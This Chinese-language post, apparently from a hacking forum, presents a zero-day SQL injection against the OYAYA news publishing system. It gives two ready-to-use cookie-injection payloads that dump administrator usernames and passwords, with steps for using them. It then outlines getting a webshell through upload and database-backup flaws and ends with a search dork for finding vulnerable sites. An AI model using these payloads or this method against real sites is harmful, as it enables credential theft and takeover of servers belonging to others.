凹丫丫新闻发布系统ACC版SQL版最新通杀注入0day

利用代码： javascript:alert(document.cookie="BigClassName="+escape("%25' and 1=2 union select 1,admin,3,password,5,6,7,8,9,10,11,12,13 from admin where 1=1 and 'a'='a"));

打开http://localhost/Download.asp页面，然后在第一个页的IE地址栏中以上利用代码，然后访问http://localhost/Download.asp?页，刷新一次，系统中所有的管理员账号和密码就列出来了。
===========================================

利 用代码： javascript:alert(document.cookie="key="+escape("%25%25' and 1=2 union select admin,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from admin where 1=1 and aleave like '%25%25"));

在确定search.asp页面存在的情况下访问http://localhost/search.asp?otype=title&key=xx，然后在IE地址栏输入以上利用代码后再访问http://localhost/search.asp?otype=title& 页面，刷新，同样的系统全部管理账号密码都暴出来了。

=========================

后台拿webshell很简单，数据库备份，以及添加新闻时候上传图片程序处的解析漏洞利用，另外运气好的话还可以遇见根目录下一个上传图片程序 页：Upload_Photo.asp存在，这个页面需要登录后台后才能使用，利用方法还是闷豆兄突破的，使用双文件上传一个cer的文件，至于最终能不 能成就需要看服务器是否解析cer了！！
放一个关键字：Powered By OYAYA.CN inurl:download.asp